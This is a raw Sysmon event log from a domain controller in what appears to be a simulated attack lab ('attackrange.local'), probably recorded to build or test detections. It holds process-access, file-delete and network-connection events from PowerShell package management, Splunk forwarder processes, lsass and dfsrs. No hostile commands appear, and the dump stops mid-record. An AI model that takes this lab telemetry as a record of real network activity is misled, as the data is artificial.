21:07:57.882{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024154Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.882{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024153Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.882{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024152Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.882{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A2AD-60D3-1C06-00000000CF01}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024151Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.882{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2AD-60D3-1C06-00000000CF01}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024150Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.883{4DB9351A-A2AD-60D3-1C06-00000000CF01}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024149Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.851{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\tkceuvlb.kvjMD5=6C567765F0CA1DEFAB41E64FC9BA38AD,SHA256=0F5E93DA37D4709EB6B0C08E6515F2F8413CADBE55FC7C0EA3B67AF406B936E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024148Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.835{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\ifi40drg.ft4MD5=80675050C8B3C7ECB6479E24B2F4D3D2,SHA256=B6B905283595B90EAF630051788456F36E85D48A27372F87AB620DD99CAFA2F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024147Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.819{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\eehmknuo.k0tMD5=26C50195ABBFDE6611A4CAEE3585960B,SHA256=B2915EDDDBD8029336C3933115B8D8E9471FB63039177901606C5D101770E059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024146Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.804{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\mt3qkl4i.j2bMD5=C9407671041EAF874E42FEEA83E9E055,SHA256=5623F3990AC72788F17C5D57127B8E99F31369D39030A38E203367E2B6041ED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024145Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.772{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\djw4inso.35sMD5=26C50195ABBFDE6611A4CAEE3585960B,SHA256=B2915EDDDBD8029336C3933115B8D8E9471FB63039177901606C5D101770E059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024144Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.757{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\rcmof2wj.oalMD5=D35B8C04DA801DE749B12D5DA8A0B9A0,SHA256=9CB8C56FA40380069256C24AB816BFD0E08201E16B654BD76D0EC0608DC1CCE1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024143Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.172{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61478-false10.0.1.12-8000- 10341000x800000000000000024142Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.179{4DB9351A-A2AC-60D3-1B06-00000000CF01}68366700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024186Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.976{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D9A52D22A015972FA87B90E05AA4289,SHA256=09FE67633AA97259EB579510990965199797178430CF6EEEA4046A6A03DF5FFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024185Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.944{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5f0xah43.l13.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024184Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.929{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_mze03wpy.g4m.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024183Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.929{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_mze03wpy.g4m.ps12021-06-23 21:07:58.929 10341000x800000000000000024182Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.694{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DDD-60D3-1500-00000000CF01}1256C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024181Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.694{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DDD-60D3-1500-00000000CF01}1256C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024180Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.694{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DDD-60D3-1500-00000000CF01}1256C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024179Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.382{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\1w2cbuqc.r55MD5=628DA2D060916BBA4E8623EB3E53CDC8,SHA256=DE2EBFE08D13AB88EFC596DCC2AA39982EBC61366A6A222789FADF8F902EFC4A,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 11241100x800000000000000024178Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:07:58.272{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Program Files\PackageManagement\ProviderAssemblies\nuget\2.8.5.208\Microsoft.PackageManagement.NuGetProvider.dll2021-06-23 21:07:58.272 354300x800000000000000024177Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.061{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61481-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 354300x800000000000000024176Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.061{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61481-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 354300x800000000000000024175Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.053{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61480-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 354300x800000000000000024174Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.053{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61480-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 354300x800000000000000024173Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.032{4DB9351A-9DDD-60D3-0D00-00000000CF01}904C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61479-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local135epmap 354300x800000000000000024172Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:57.032{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61479-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local135epmap 23542300x800000000000000024171Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.241{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\qkiwfrci.r5jMD5=26C50195ABBFDE6611A4CAEE3585960B,SHA256=B2915EDDDBD8029336C3933115B8D8E9471FB63039177901606C5D101770E059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024170Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.179{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\s0l3jztm.24rMD5=D35B8C04DA801DE749B12D5DA8A0B9A0,SHA256=9CB8C56FA40380069256C24AB816BFD0E08201E16B654BD76D0EC0608DC1CCE1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024169Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.132{4DB9351A-A2AD-60D3-1C06-00000000CF01}47285748C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024168Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.085{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=17449126F85C19E92570E2E397861D9A,SHA256=6287E92E5508C33770727CE2F3C8B3C5BB0FA932C55C5F1300A1FE6846575567,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024167Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.085{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1538B4ADF44DFFFCFCF6D324750A3F7E,SHA256=41FB7A1D5EDC7972CF5086F1494AE08D52FCFBE4C3ADE00E54E64903D449A10D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024166Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.069{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\cz3fl0ce.aiwMD5=14AD3E020B9E8121460254AEC3AAEA2F,SHA256=24A76615A9B93AFF49269A1EDFBBCD45FD41A60326433524BB614DEE1183CF6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024165Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.038{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\gzyela5p.mqcMD5=0B389CA2DA08BF7B217828D2A4A828DE,SHA256=60D0B41C1EF939DB71B70D07E65DFB09B0379B2939420A63FAEA07C810D33015,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024164Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.022{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\fuze3mjn.fstMD5=58DF22AFF6DA746F449C60D566891608,SHA256=263210FC8DC380AF590E8056B97D16F8C3543F282D09FE08E34A141E60B1A02E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024163Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:58.007{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Microsoft.PackageManagement\tfgsdjgd.upsMD5=A3479274A236C3BB0348E595DBCC76CD,SHA256=4FC03FD60CABACEF9E895F40A0C20034BA073B82223953FAC14FB2FA9BF2D8D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024196Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:59.958{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024195Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:59.585{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2AF-60D3-1D06-00000000CF01}6504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024194Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:59.585{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024193Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 